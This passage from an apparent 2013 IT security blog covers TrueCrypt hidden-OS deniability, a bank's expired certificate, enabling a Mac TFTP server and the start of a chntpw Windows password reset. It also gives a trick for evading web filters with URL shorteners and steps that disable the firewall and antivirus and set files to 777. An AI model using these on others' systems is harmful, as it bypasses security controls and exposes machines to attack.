part is a little outside of the scope of this post, however, except to say that the presence of random bits on a disk is not evidence enough to definitively prove the existence of encrypted data. Many disk shredding applications write random bits when wiping disks, for instance. <br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLuT-_iJdXlo6_DSNm9Jzq5isFZqBlHInLl-dVFcnJ0rmYN7xmCtp5859OQAcndhgq770lJo12QNTUitLbwvu_0Ui1Leh_v9iBYvOSaGvYsw22JjriMXsbC-f8T2UepPdnjwXUxdDLH3U/s1600/adversary.png" style="margin-left: auto; margin-right: auto;"><img border="0" height="183" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLuT-_iJdXlo6_DSNm9Jzq5isFZqBlHInLl-dVFcnJ0rmYN7xmCtp5859OQAcndhgq770lJo12QNTUitLbwvu_0Ui1Leh_v9iBYvOSaGvYsw22JjriMXsbC-f8T2UepPdnjwXUxdDLH3U/s400/adversary.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i>(click to enlarge)</i></td></tr>
</tbody></table>
<br />
<b>5. Encrypt a hidden operating system:</b>
You can have your computer dual boot to both a decoy operating system
and a <a href="http://www.truecrypt.org/docs/?s=hidden-operating-system" target="_blank">hidden operating system</a>. An attacker theoretically would not be
able to tell that a hidden operating system can even be booted to
because it's totally based on what password you type during boot up. The
password prompt in the bootloader knows to send you to the right
operating system depending on what password is entered. If you were
forced to provide access to the computer by revealing the password, you
could simply provide the password to the decoy operating system. The
attacker could then boot into the decoy operating system and if they
were savvy, they could see that there was an apparently empty 2nd
partition on your hard drive. If skilled in forensics, they could see
that the 2nd partition was populated with what appears to be random
data. Although theoretically no technology currently exists for them to
prove the presence of a hidden operating system (or that the secondary partition is
even encrypted at all), the presence of this mysterious partition may
cause them to question whether there is a hidden operating system.
However, the architecture of the secondary partition is such that there
is an outer volume and an inner volume, similar to #3 above. The victim
would thus have an additional decoy mechanism by placing fake sensitive
data on the outer volume of the second partition. If questioned about
the presence of random data on the second partition, the victim could
simply claim that they wiped the whole drive to DoD specifications with 3
passes of random data using a <a href="http://www.dban.org/" target="_blank">disk shredding software tool</a>. Still, if they were coerced
(think gun to your head situation) into admitting the presence of
encrypted data on the secondary partition, they could simply provide the
password to the <i>outer volume</i> on the secondary partition and plausibly deny any suggestion that a <i>hidden volume</i> exists
on the secondary partition. (Yes, there are a total of 3 passwords in
this scenario: one to the decoy operating system on the first partition,
one to the outer volume on the second partition and one to the additional
hidden volume on the second partition.) The attacker still could suspect
that there is a hidden operating system and ask you why you put your
data into a secondary partition. You could say that this partition was
so that you could keep your data files separate from your system files,
as many admins do. Or you could say that you wanted to have a separate
level of security for your top secret data. They theoretically would not be able to
prove that the hidden operating system exists. You may be wondering what type of situations this could possibly be useful for. Well, among other scenarios, think of an American spy detained by an unfriendly government who finds themselves a defendant in an espionage case. In this situation, the defendant could potentially be protected by the plausible deniability afforded by this setup.<br />
<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEja9MGuX1z0H0bhEd7tzdbcMSZl7T1t0st7k5o-EhPu1cT1g5Fo4TXBT12kk2UGO-91s2TzQKK86AYPSX_FoCINCF4Ti-M72pADYCS1KC83QRhLCEdx8K_XyZYJWR1t8sSzRjT5Uqg-lts/s1600/TC_boot2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEja9MGuX1z0H0bhEd7tzdbcMSZl7T1t0st7k5o-EhPu1cT1g5Fo4TXBT12kk2UGO-91s2TzQKK86AYPSX_FoCINCF4Ti-M72pADYCS1KC83QRhLCEdx8K_XyZYJWR1t8sSzRjT5Uqg-lts/s640/TC_boot2.png" width="556" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i>System bootup in a hidden OS scenario and how all 3 volumes are accessed </i></td></tr>
</tbody></table>
<br />
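To make the two-header idea behind #3 and #5 concrete, and the point under #4 that random bits on a disk prove nothing, here is an added Python model; it is not TrueCrypt's code and not its on-disk format, and it is not part of the original post. The slot layout, the PBKDF2 settings, the SHA-256 counter-mode cipher standing in for AES-XTS, and the sample passwords and contents are all assumptions made for the demo. One container, two header slots that both look like random bytes, and the password alone decides which volume (if any) opens:

```python
import hashlib
import hmac
import math
import os
import struct

# Added toy model of the two-header container; NOT TrueCrypt's on-disk format.
# Two fixed 128-byte header slots sit at the front of the container
# (slot 0 = outer volume, slot 1 = hidden volume). Both slots always exist and
# always look like random bytes, so without a password a used slot cannot be
# told from an unused one.
SLOT_SIZE = 128
SALT_LEN = 16
MAC_LEN = 32
HDR_FMT = ">4sQQ32s"                 # magic, data offset, data length, master key
HDR_LEN = struct.calcsize(HDR_FMT)   # 52 bytes
MAGIC = b"TOYV"
PBKDF2_ROUNDS = 20_000               # kept low for the demo; real tools use far more

def derive_keys(password: bytes, salt: bytes):
    """PBKDF2-HMAC-SHA256 -> (header encryption key, header MAC key)."""
    km = hashlib.pbkdf2_hmac("sha256", password, salt, PBKDF2_ROUNDS, 64)
    return km[:32], km[32:]

def keystream_xor(key: bytes, data: bytes) -> bytes:
    """Counter-mode stream cipher with SHA-256 as the PRF. It stands in for the
    AES-XTS a real disk-encryption tool uses; the property that matters here is
    the same: the output is indistinguishable from random without the key."""
    out = bytearray()
    for i in range(0, len(data), 32):
        block = hashlib.sha256(key + i.to_bytes(8, "big")).digest()
        out += bytes(a ^ b for a, b in zip(data[i:i + 32], block))
    return bytes(out)

def seal_header(password: bytes, offset: int, length: int, master_key: bytes) -> bytes:
    """salt || Enc(header) || HMAC(ciphertext), padded out with random bytes."""
    salt = os.urandom(SALT_LEN)
    enc_key, mac_key = derive_keys(password, salt)
    ct = keystream_xor(enc_key, struct.pack(HDR_FMT, MAGIC, offset, length, master_key))
    tag = hmac.new(mac_key, ct, "sha256").digest()
    slot = salt + ct + tag
    return slot + os.urandom(SLOT_SIZE - len(slot))

def create_container(size, outer_pw, outer_data, hidden_pw, hidden_data):
    """Outer data goes at the start of the data area, hidden data at the very
    end, i.e. inside what the outer volume would report as free space. (A real
    tool must also stop outer-volume writes from clobbering that tail.)"""
    data_start = 2 * SLOT_SIZE
    if data_start + len(outer_data) + len(hidden_data) > size:
        raise ValueError("container too small")
    buf = bytearray(os.urandom(size))   # start from a 'wiped' disk: all random
    outer_key, hidden_key = os.urandom(32), os.urandom(32)
    hidden_off = size - len(hidden_data)
    buf[0:SLOT_SIZE] = seal_header(outer_pw, data_start, len(outer_data), outer_key)
    buf[SLOT_SIZE:data_start] = seal_header(hidden_pw, hidden_off, len(hidden_data), hidden_key)
    buf[data_start:data_start + len(outer_data)] = keystream_xor(outer_key, outer_data)
    buf[hidden_off:] = keystream_xor(hidden_key, hidden_data)
    return bytes(buf)

def open_volume(container: bytes, password: bytes):
    """Try the password against both slots. Returns ('outer', data),
    ('hidden', data) or None. The caller never names the volume it wants;
    the password alone selects it, just like the boot-time prompt."""
    for idx, name in enumerate(("outer", "hidden")):
        slot = container[idx * SLOT_SIZE:(idx + 1) * SLOT_SIZE]
        salt = slot[:SALT_LEN]
        ct = slot[SALT_LEN:SALT_LEN + HDR_LEN]
        tag = slot[SALT_LEN + HDR_LEN:SALT_LEN + HDR_LEN + MAC_LEN]
        enc_key, mac_key = derive_keys(password, salt)
        if not hmac.compare_digest(hmac.new(mac_key, ct, "sha256").digest(), tag):
            continue                    # wrong password for this slot
        magic, off, length, master_key = struct.unpack(HDR_FMT, keystream_xor(enc_key, ct))
        if magic != MAGIC:
            continue
        return name, keystream_xor(master_key, container[off:off + length])
    return None

def byte_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte. Ciphertext, a PBKDF2 salt and the
    output of a 'wipe with random data' pass all score close to 8.0, which is
    why high entropy alone does not prove that encrypted data is present."""
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)

if __name__ == "__main__":
    c = create_container(8192, b"decoy-pw", b"harmless decoy files", b"real-pw", b"the real files")
    print(open_volume(c, b"decoy-pw"))   # ('outer', b'harmless decoy files')
    print(open_volume(c, b"real-pw"))    # ('hidden', b'the real files')
    print(open_volume(c, b"wrong"))      # None
    print(round(byte_entropy(c), 2), round(byte_entropy(os.urandom(8192)), 2))
```

Both slots are always written, so a container with no hidden volume and one with a hidden volume are byte-for-byte indistinguishable, and `byte_entropy` scores the whole container, a freshly wiped disk and `os.urandom` output alike. The part a real tool adds that this toy skips is hidden-volume protection: writes to the outer volume must refuse to touch the tail region, or the outer volume silently destroys the hidden one.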
<br />
So to recap, even in the
most secure scenario, they could boot up your computer and suspect that
you have encrypted data but if they forced you to grant access you could
just provide access to the decoy operating system. At that point, if
they also forced you to grant access to the suspected secondary
encrypted partition, you could do so without granting access to the
hidden operating system. If they suspected the presence of a hidden
operating system, in theory you could plausibly deny its existence much
easier than you could deny the existence of the decoy operating system
on the first partition and the outer volume of the secondary partition.
Even in the case of an official government investigation or court case,
there would theoretically be no way to prove beyond a shadow of a doubt
that a hidden operating system is on a given computer. An investigation
involving the best available forensics software publicly known in our time could not
prove it. (The NSA or others <a href="http://www.nytimes.com/2013/09/06/us/nsa-foils-much-internet-encryption.html?_r=0" target="_blank">may have technology that is not known to the public</a>, etc. but <a href="http://www.theregister.co.uk/2010/06/28/brazil_banker_crypto_lock_out/" target="_blank">in multiple cases the government has not been able to successfully decrypt TrueCrypt volumes</a>.) The whole plausible deniability concept here is based on the
idea that they can prove the likely existence of the outer volume on the
second partition but they can't prove the existence of the inner volume
on the second partition. What benefit is there to solution #5 over
solution #3 when
they both offer plausible deniability of hidden data? Among other
things, with #5 even installed applications and all locally
stored logs and traces of activity would be hidden in the event of a
situation in which the victim is being coerced to provide access or is
in a hostile situation of that nature. (Again, think gun to your head.)<br />
<br />
<br />
A few disclaimers:<br />
<br />
-I'm
not suggesting that you hide things from the government or law
enforcement, etc. There are many situations where this technology could
be used for good or for evil. Please don't use it for evil. Just good.
(Duh.) Also, when I use the term government, keep in mind that there are
good people who may need to hide data from evil foreign governments so
don't jump to the conclusion that I am trying to help bad people.<br />
<br />
-With solution #5, you need to boot into the
decoy operating system regularly and use it or the logs will show it
hasn't been used in a while, which could give away the fact that you've
been using a hidden operating system.<br />
<br />
-The computer may be connected to a network (including the Internet) only
when the decoy operating system is running. When the hidden operating
system is running, <a href="http://www.truecrypt.org/docs/?s=hidden-volume-precautions" target="_blank">the computer should not be connected to any network</a>,
including the Internet. Adhering to this is imperative, as the hidden
operating system could be logged on a network, therefore giving away its
existence.<br />
<br />
-It's very hard to maintain a hidden
operating system. It works in theory but is a very difficult setup to
maintain, so watch yourself carefully.<br />
<br />
-None of this
blog post (or anything on this blog, for that matter) are meant as legal
advice. I am not a legal professional, and this post is not intended to
answer your legal questions. (Duh.) <br />
<br />
In my next posts (coming soon), I will be providing instructions on how to set up a hidden operating system. I'm
only going to give you the instructions for #5 (above), as it is the
most challenging and least documented. But the good news is that it's
not that hard, due to the amazing job that the developers have done with
TrueCrypt!<br /><br /><a href="http://breakstuffmajorly.blogspot.com/2013/09/plausible-deniability-of-hidden-os-part-2.html">Click here to go to Part 2 - Setup your second partition</a><br />
</div>
BancorpSouth's Website is Insecure! (published 2013-09-03T13:16:00-05:00, updated 2013-09-03T21:09:00-05:00)<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhksFL2h-Py4Kyx6X91MBY34YkKhFJUqTCUoVf8eej7RXvQWsuRwQSFqeFD7RDVsGtDS40T_i1LeqrndptWunbYbDsHbOpuVTPl1fbtYDv59yOS2ydvfqq6bAuA1Ds5V0fbNHB9WBn4Vns/s1600/bancorpsouth.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="214" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhksFL2h-Py4Kyx6X91MBY34YkKhFJUqTCUoVf8eej7RXvQWsuRwQSFqeFD7RDVsGtDS40T_i1LeqrndptWunbYbDsHbOpuVTPl1fbtYDv59yOS2ydvfqq6bAuA1Ds5V0fbNHB9WBn4Vns/s400/bancorpsouth.png" width="400" /></a></div>
<br />
Wow.... I discovered this past weekend that BancorpSouth's website has an expired certificate which expired 8/31/13! (Yes, my system time is set correctly.) At the time I am writing this post (1:16 PM on 9/3/13), all you have to do is go to <a href="http://bancorpsouthonline.com/">bancorpsouthonline.com</a> to see the certificate error. I called them immediately but found that the only line I could call to talk to a live person on the holiday weekend was the credit card fraud line. So I told them of my concern but they did not care. I asked the woman on the phone to transfer me to her supervisor and she made me hold for a long time before coming back and saying that no supervisor was available. She took my number for them to call me back but they never did.<br />
<br />
This morning, I checked and it still has an expired certificate. This is inexcusable for a bank! I also checked their Facebook page and found that while they admitted to being aware of the issue, they were still advising users to login as normal (which requires bypassing the certificate error!) As I'm sure you know, this is horrible. Users should never bypass a certificate warning, but especially not for a bank! This means that users are sending their password across the internet to a non-verified website that could be being redirected to a hacker, for all they know!<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZcspKyO1yxJG8H5RP6LVL_oYzMW5QB3Y3jZ7HnLsQn9dHkMy9pIVAnk8V9NGp6JVhSmwiFE7dgpdi67OArn-bTKdvjiEmS8j_w4fRl49r5lQYRW3tm3Fln0OFFHsWubzZ9ih8Y3ylW0o/s1600/fb.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZcspKyO1yxJG8H5RP6LVL_oYzMW5QB3Y3jZ7HnLsQn9dHkMy9pIVAnk8V9NGp6JVhSmwiFE7dgpdi67OArn-bTKdvjiEmS8j_w4fRl49r5lQYRW3tm3Fln0OFFHsWubzZ9ih8Y3ylW0o/s1600/fb.png" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
I also used an online tool that allows you to verify a website's certificate. It showed the certificate as expired, as well:<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikuDqEok7Rtq8WO-vDpCdimBMt_L3ZZaQ3BzFOQw_V6U05S606bsMLE_ahjGH1gqFGfHak3dTE0EWH5-gGBkgEtFRQk6ZX0GyZ3tB0j94W8JseqL5RH41qHbODAaQTx30XauWJImtohfU/s1600/cert.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="237" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikuDqEok7Rtq8WO-vDpCdimBMt_L3ZZaQ3BzFOQw_V6U05S606bsMLE_ahjGH1gqFGfHak3dTE0EWH5-gGBkgEtFRQk6ZX0GyZ3tB0j94W8JseqL5RH41qHbODAaQTx30XauWJImtohfU/s400/cert.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Since I have already attempted to contact BancorpSouth and they were dismissive (told me to call back later and talk to customer service after the holiday, etc.), I have been forced to contact the media. Hopefully, the end result of that will be that the average person will be safer by this being exposed. BancorpSouth made two mistakes: 1. Letting the certificate expire was inexcusable for a bank. 2. BancorpSouth should not have advised their customers to go ahead and use the site while the certificate is expired.</div>
<br />
By the way, I want to also mention that their iPad app works just fine still! That is a bad thing!! That means that the app itself may not be even checking the certificate at all! BancorpSouth = FAIL<br />
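As an added illustration (not code from the post, and not BancorpSouth's), here is the validity check a client is supposed to make, written against Python's standard ssl module, with the strict client configuration beside the weak one that lets an app keep working against an expired certificate. The certificate dictionary is constructed for the demo in the shape getpeercert() returns; only its notAfter date comes from the post, and the timestamp for "when the post was written" is an approximation.

```python
import ssl
import time
from typing import Optional

# Constructed sample in the shape ssl.SSLSocket.getpeercert() returns. The
# notAfter value is the expiry date the post reports (8/31/13); the name and
# notBefore are made up for the demo.
SAMPLE_CERT = {
    "subject": ((("commonName", "example.invalid"),),),
    "notBefore": "Sep 01 00:00:00 2012 GMT",
    "notAfter": "Aug 31 23:59:59 2013 GMT",
}

# Roughly when the post was written (1:16 PM on 9/3/13, US Central), in UTC.
POST_TIME = ssl.cert_time_to_seconds("Sep 03 18:16:00 2013 GMT")

def cert_validity_problem(cert: dict, now: Optional[float] = None) -> Optional[str]:
    """Return None when 'now' lies inside the certificate's validity window,
    otherwise a short reason. This is the check a browser performs before it
    shows the warning that customers were being told to click through."""
    now = time.time() if now is None else now
    not_before = ssl.cert_time_to_seconds(cert["notBefore"])
    not_after = ssl.cert_time_to_seconds(cert["notAfter"])
    if now < not_before:
        return "not yet valid"
    if now > not_after:
        return f"expired {int((now - not_after) // 86400)} day(s) ago"
    return None

def strict_client_context() -> ssl.SSLContext:
    """What an online-banking client must use: chain, hostname and validity
    period are all verified, and an expired certificate fails the handshake."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = True
    ctx.verify_mode = ssl.CERT_REQUIRED
    return ctx

def broken_client_context() -> ssl.SSLContext:
    """The weak configuration to look for in a code review. A client built
    like this keeps working against an expired (or forged) certificate, which
    is the most likely explanation for the iPad app behaviour noted above."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False      # must be cleared before verify_mode
    ctx.verify_mode = ssl.CERT_NONE
    return ctx

def context_is_strict(ctx: ssl.SSLContext) -> bool:
    """True only when both the chain check and the hostname check are on."""
    return ctx.verify_mode == ssl.CERT_REQUIRED and bool(ctx.check_hostname)

if __name__ == "__main__":
    print(cert_validity_problem(SAMPLE_CERT, POST_TIME))   # expired 2 day(s) ago
    print(context_is_strict(strict_client_context()), context_is_strict(broken_client_context()))
```

A mobile app that "works just fine" against an expired certificate is the symptom of the second context: the TLS layer was told not to verify, so it cannot tell a stale certificate from a forged one either.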
<br />
<i>UPDATE 1 of 3: BancorpSouth has removed my post and some other negative posts about this issue from their Facebook timeline. Good thing I took screen captures and posted them here before they deleted them! They also blocked me from being able to post to their timeline. So this is how much they care about online privacy? First they fail their customers by making them vulnerable to being hacked, then they lie to them and tell them they are safe...and then lastly they block anyone from seeing the truth. Sorry to inform you BancorpSouth customers but BancorpSouth doesn't care about keeping your money secure. Time for you to find a new bank.</i><br />
<i><br /></i>
<i>Here's what the above thread looked like after they deleted the truth from their Timeline and only preserved the post that made them look good:</i><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnstTgaPMpt4igQNo7A-Jt4JK9E6sE-bC0lJiJq3tF3EwRARPsobRXOwjMIf0anhv1IMXl-CgamE0rTznikogOQykD9OXyXX28tFwhraf_3Fn1sLA4JJNi_TSmnWfvbQwzkfARRubnygo/s1600/scrubbed.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnstTgaPMpt4igQNo7A-Jt4JK9E6sE-bC0lJiJq3tF3EwRARPsobRXOwjMIf0anhv1IMXl-CgamE0rTznikogOQykD9OXyXX28tFwhraf_3Fn1sLA4JJNi_TSmnWfvbQwzkfARRubnygo/s1600/scrubbed.png" /></a></div>
<br />
<i>Here's another comment of them admitting the problem but claiming that it is still safe to use their website:</i> <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHic_s5dX8R-mcN6RCvm4eiv4OHkzqaiYrdjGlWiN25tp3tekdHeGk54JbCR3Qreemv9y956H9IGGn1LMrHRrqnN5tdgKzrih1XXJCSBDJflqyVSvuILj0oJJub2mObOhV8pc719_niJ8/s1600/another.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHic_s5dX8R-mcN6RCvm4eiv4OHkzqaiYrdjGlWiN25tp3tekdHeGk54JbCR3Qreemv9y956H9IGGn1LMrHRrqnN5tdgKzrih1XXJCSBDJflqyVSvuILj0oJJub2mObOhV8pc719_niJ8/s1600/another.png" /></a></div>
<br />
<br />
<i>UPDATE 2 of 3: BancorpSouth has finally fixed their website. It was insecure for THREE DAYS.</i><br />
<br />
<i>UPDATE 3 of 3: It occurred to me just now that when BancorpSouth told their users that the site was still safe they were unfortunately conditioning their customers to ignore security errors. This is very
bad practice. Now they have conditioned their users to disregard certificate errors. So what if a user next month is the victim of a
hack that redirects them to a malicious site but shows a certificate error? The
user will ignore it because they have been conditioned to and potentially get their credentials stolen! Way to go
BancorpSouth! :(</i>
Deceive a Webfilter With a URL Shortener (published 2013-08-28T01:01:00-05:00, updated 2013-08-29T16:43:23-05:00)<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3dEGcLrJBBznsgA51wlhC6753BKjIj8OcS3zzjCi2I0GTUQxq8w3EMrhEMbWO65FT_Rl50647Sw9Fv3AU98f6OFmSyGopU_kq3bdzDkwJM6epGUhHgpSxWZvKRt-2Rmr9er9wjD_j42Q/s1600/nojoy.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3dEGcLrJBBznsgA51wlhC6753BKjIj8OcS3zzjCi2I0GTUQxq8w3EMrhEMbWO65FT_Rl50647Sw9Fv3AU98f6OFmSyGopU_kq3bdzDkwJM6epGUhHgpSxWZvKRt-2Rmr9er9wjD_j42Q/s320/nojoy.png" width="320" /></a></div>
<br />
This is not foolproof but I have had it get me out of a jam... Sometimes I will have a web filter that is blocking me from downloading something like an admin/security tool and I either don't have access to the web filter appliance or am tired of trying to make the web filter appliance behave. (They can be really finicky, sometimes!!) One trick I have found that has helped me out when I am in a big hurry to download a file is to use a URL shortener. Strangely enough, I've seen multiple brands of web filter appliances that weren't smart enough to deal with this. What I will do is simply copy the actual download URL to the file and put it in something like <a href="http://tinyurl.com/">tinyurl.com</a>. Then I use the new URL and quite often, the web filter lets it get by! Joy!
Using Mountain Lion's built-in TFTP server (published 2013-08-26T02:02:00-05:00, updated 2013-08-26T14:01:09-05:00)<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjt4_JKowO87UZcwBYg9M2jYaAv1HfNcOpnylNHzdQD2l24IHWfmi2k4kS6ILAb-5wlXP5Q4CudxhyoTtZUzzAS_co1E0PLcE-037C46x4HE4brRWWwlBPi94BXgwwws8nS88HI_mWyniE/s1600/glowing-fruit.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="302" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjt4_JKowO87UZcwBYg9M2jYaAv1HfNcOpnylNHzdQD2l24IHWfmi2k4kS6ILAb-5wlXP5Q4CudxhyoTtZUzzAS_co1E0PLcE-037C46x4HE4brRWWwlBPi94BXgwwws8nS88HI_mWyniE/s400/glowing-fruit.png" width="400" /></a></div>
<br />
It's finally clear to me why Macs are better. Because there's a TFTP server built in, of course! This feature is obviously built in for all those more-creative-than-thou types who disdain Windows computers because there isn't a glowing piece of fruit embedded into the chassis. Because those kind of people need a TFTP server, right?<br />
<br />
So how do you use Mac OS X Mountain Lion's built-in TFTP server? Well, like all things Mac, it's as user friendly as all get out...<br />
<br />
1. Turn off the Mac firewall: System Preferences>Security and Privacy>Firewall<br />
<br />
2. Copy the file you want to provide to TFTP clients to the default TFTP directory /private/tftpboot/ by using a command like: <i><b>sudo cp /Users/jdoe/Documents/file.tar /private/tftpboot/file.tar</b></i><br />
<br />
3. Disable any antivirus/firewall software you may be running (doubtful)<br />
<br />
4. Grant read/write permissions on the file to everyone with this command:<br />
<b><i>sudo chmod 777 /private/tftpboot/[filename]</i></b><br />
<br />
5. Start the TFTP daemon with these commands: <br />
<i><b>sudo launchctl load -F /System/Library/LaunchDaemons/tftp.plist<br />sudo launchctl start com.apple.tftpd</b></i><br />
<br />
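Since TFTP is a protocol you can hold in your head, here is an added Python example (not Apple's tftpd and not from the original post) that speaks it: an RFC 1350 read client plus a tiny in-process server so the exchange can be watched on loopback. The host, file names and sample bytes are placeholders. Notice what the packets do not carry: no credentials of any kind, which is why the firewall toggling above matters and why the daemon should be unloaded when you are done.

```python
import socket
import struct
import threading

# Added, self-contained TFTP (RFC 1350) read client plus a one-shot server for
# the loopback demo. Not Apple's tftpd code.
RRQ, WRQ, DATA, ACK, ERROR = 1, 2, 3, 4, 5
BLOCK = 512

def build_rrq(filename: str, mode: str = "octet") -> bytes:
    return struct.pack("!H", RRQ) + filename.encode() + b"\0" + mode.encode() + b"\0"

def build_data(block: int, payload: bytes) -> bytes:
    return struct.pack("!HH", DATA, block) + payload

def build_ack(block: int) -> bytes:
    return struct.pack("!HH", ACK, block)

def build_error(code: int, message: str) -> bytes:
    return struct.pack("!HH", ERROR, code) + message.encode() + b"\0"

def parse_packet(pkt: bytes):
    """Decode one TFTP packet into (opcode, ...). Note what is absent: there is
    no username, password or session key anywhere in the protocol."""
    (op,) = struct.unpack("!H", pkt[:2])
    if op in (RRQ, WRQ):
        name, mode, _ = pkt[2:].split(b"\0", 2)
        return op, name.decode(), mode.decode()
    if op in (DATA, ERROR):
        (num,) = struct.unpack("!H", pkt[2:4])
        rest = pkt[4:]
        return (op, num, rest) if op == DATA else (op, num, rest.split(b"\0", 1)[0].decode())
    if op == ACK:
        return op, struct.unpack("!H", pkt[2:4])[0]
    raise ValueError(f"unknown opcode {op}")

def tftp_get(host: str, filename: str, port: int = 69, timeout: float = 2.0) -> bytes:
    """Fetch one file: send RRQ, then ACK each DATA block until a short block."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_rrq(filename), (host, port))
        out, expected = bytearray(), 1
        while True:
            pkt, peer = sock.recvfrom(4 + BLOCK)   # server replies from a fresh port
            parsed = parse_packet(pkt)
            if parsed[0] == ERROR:
                raise OSError(f"tftp error {parsed[1]}: {parsed[2]}")
            if parsed[0] != DATA or parsed[1] != expected:
                continue                            # duplicate or stray datagram
            out += parsed[2]
            sock.sendto(build_ack(expected), peer)
            if len(parsed[2]) < BLOCK:
                return bytes(out)
            expected += 1

def serve_once(files: dict, bind=("127.0.0.1", 0)):
    """Answer a single RRQ for the demo; returns (port, thread). Like a real
    tftpd it moves the transfer to a new socket once the request arrives."""
    listen = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    listen.bind(bind)
    port = listen.getsockname()[1]

    def run():
        listen.settimeout(10)
        xfer = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        xfer.settimeout(10)
        try:
            pkt, client = listen.recvfrom(4 + BLOCK)
            req = parse_packet(pkt)
            if req[0] != RRQ or req[1] not in files:
                xfer.sendto(build_error(1, "File not found"), client)
                return
            data, block = files[req[1]], 1
            while True:
                chunk = data[(block - 1) * BLOCK:block * BLOCK]
                xfer.sendto(build_data(block, chunk), client)
                if parse_packet(xfer.recvfrom(4)[0]) != (ACK, block):
                    return                          # lost or odd ACK: give up (demo)
                if len(chunk) < BLOCK:
                    return                          # short block ends the transfer
                block += 1
        except OSError:
            pass
        finally:
            xfer.close()
            listen.close()

    t = threading.Thread(target=run, daemon=True)
    t.start()
    return port, t
```

On the permissions step above: the BSD-derived tftpd only accepts a write to a file that already exists and is publicly writable, so chmod 777 makes the served file overwritable by anyone who can reach UDP 69; if you only need to serve it, world-readable (644) is enough. When finished, `sudo launchctl unload -F /System/Library/LaunchDaemons/tftp.plist` stops the daemon again.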
See? I told you Apple makes everything easy and straightforward on a Mac! So you trendy types be sure to get you a post-it-note with these commands placed on your monitor for easy reference!
Reset Local Windows Password with chntpw (published 2013-07-17T00:31:00-05:00, updated 2013-07-18T13:50:49-05:00)<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHhVzoHoFJCQnahA1h_vXuqWAB7L5nHLE3HV8aArH4YofgZx9to1NIp_NKSKxtAKvhLwyqXgRTnwHxHPRsjw_lGr2nMS-QQP-7tmVogGnOB4ACzLVOTNFYER8okUzesHU0Otq0EyrZb_s/s1600/knoppix.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHhVzoHoFJCQnahA1h_vXuqWAB7L5nHLE3HV8aArH4YofgZx9to1NIp_NKSKxtAKvhLwyqXgRTnwHxHPRsjw_lGr2nMS-QQP-7tmVogGnOB4ACzLVOTNFYER8okUzesHU0Otq0EyrZb_s/s1600/knoppix.jpg" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
I usually prefer to reset local Windows admin passwords with <a href="http://pogostick.net/~pnh/ntpasswd/" target="_blank">Offline NT Password & Registry Editor</a>. But what if all you have handy is a live Knoppix? Here's how to do it with Knoppix using chntpw. It's far simpler than I had thought, so give it a try.<br />
<br />
<ol>
<li>Boot into Knoppix and pull up a root terminal</li>
<li><b>apt-get install chntpw</b> (requires a network connection)</li>
<li>Mount the Windows system drive before continuing to step 4</li>
